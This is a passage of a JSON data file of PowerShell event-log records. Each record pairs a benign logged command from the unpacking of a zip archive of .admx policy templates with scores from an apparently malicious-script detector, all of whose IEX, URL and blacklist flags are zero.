"detect_sign": 0, "logistic_reg": 57.02957879083289, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Adding 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Adding 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5702957879083289, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181246", "time": {"SystemTime": "2024-10-18T10:28:14.3946135Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): 
\"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181248", "time": {"SystemTime": "2024-10-18T10:28:14.4123321Z"}, "totalscore": {"totalscore": 43.27623489709821, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 43.27623489709821, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"13\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; 
value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"13\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.43276234897098215, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181249", "time": {"SystemTime": "2024-10-18T10:28:14.4132286Z"}, "totalscore": {"totalscore": 46.652752419985084, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.652752419985084, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/ActiveXInstallService.admx\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/ActiveXInstallService.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46652752419985083, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181250", "time": {"SystemTime": "2024-10-18T10:28:14.4140868Z"}, "totalscore": {"totalscore": 79.75392552014868, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 79.75392552014868, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): 
\"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\ActiveXInstallService.admx\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\ActiveXInstallService.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7975392552014868, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181251", "time": {"SystemTime": "2024-10-18T10:28:14.4149541Z"}, "totalscore": {"totalscore": 48.62633183162733, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 48.62633183162733, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.48626331831627334, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181252", "time": {"SystemTime": "2024-10-18T10:28:14.4210866Z"}, "totalscore": {"totalscore": 59.24174248103225, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 59.24174248103225, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): 
\"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\ActiveXInstallService.admx'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\ActiveXInstallService.admx'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5924174248103224, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181254", "time": {"SystemTime": "2024-10-18T10:28:14.8011683Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181256", "time": {"SystemTime": "2024-10-18T10:28:14.8018101Z"}, "totalscore": {"totalscore": 42.73099294457856, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, 
"logistic_reg": 42.73099294457856, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"14\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"14\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.4273099294457856, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181257", "time": {"SystemTime": "2024-10-18T10:28:14.8028899Z"}, "totalscore": {"totalscore": 46.652752419985084, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.652752419985084, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; 
value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/AddRemovePrograms.admx\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/AddRemovePrograms.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46652752419985083, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181258", "time": {"SystemTime": "2024-10-18T10:28:14.8036529Z"}, "totalscore": {"totalscore": 79.75392552014868, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 79.75392552014868, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AddRemovePrograms.admx\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AddRemovePrograms.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7975392552014868, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181259", "time": {"SystemTime": "2024-10-18T10:28:14.8046033Z"}, "totalscore": {"totalscore": 48.62633183162733, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 48.62633183162733, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): 
name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.48626331831627334, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181260", "time": {"SystemTime": "2024-10-18T10:28:14.8065281Z"}, "totalscore": {"totalscore": 59.24174248103225, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 59.24174248103225, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AddRemovePrograms.admx'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AddRemovePrograms.admx'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5924174248103224, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181262", "time": {"SystemTime": "2024-10-18T10:28:14.9913439Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 
'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"3\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181264", "time": {"SystemTime": "2024-10-18T10:28:14.9918883Z"}, "totalscore": {"totalscore": 42.20937213776904, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 42.20937213776904, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"15\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in 
progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"15\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.42209372137769036, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181265", "time": {"SystemTime": "2024-10-18T10:28:14.9925329Z"}, "totalscore": {"totalscore": 46.652752419985084, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 46.652752419985084, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/AppCompat.admx\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"Resource/AppCompat.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.46652752419985083, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181266", "time": {"SystemTime": "2024-10-18T10:28:14.9932206Z"}, "totalscore": {"totalscore": 79.75392552014868, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 79.75392552014868, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; 
value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AppCompat.admx\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AppCompat.admx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7975392552014868, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181267", "time": {"SystemTime": "2024-10-18T10:28:14.9940815Z"}, "totalscore": {"totalscore": 48.62633183162733, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 48.62633183162733, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.48626331831627334, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181268", "time": {"SystemTime": "2024-10-18T10:28:15.0454064Z"}, "totalscore": {"totalscore": 59.24174248103225, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 59.24174248103225, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AppCompat.admx'.\"\n", 
"removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\Resource\\AppCompat.admx'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5924174248103224, "randomized_string": 0, "detect_strings_blacklist": []}]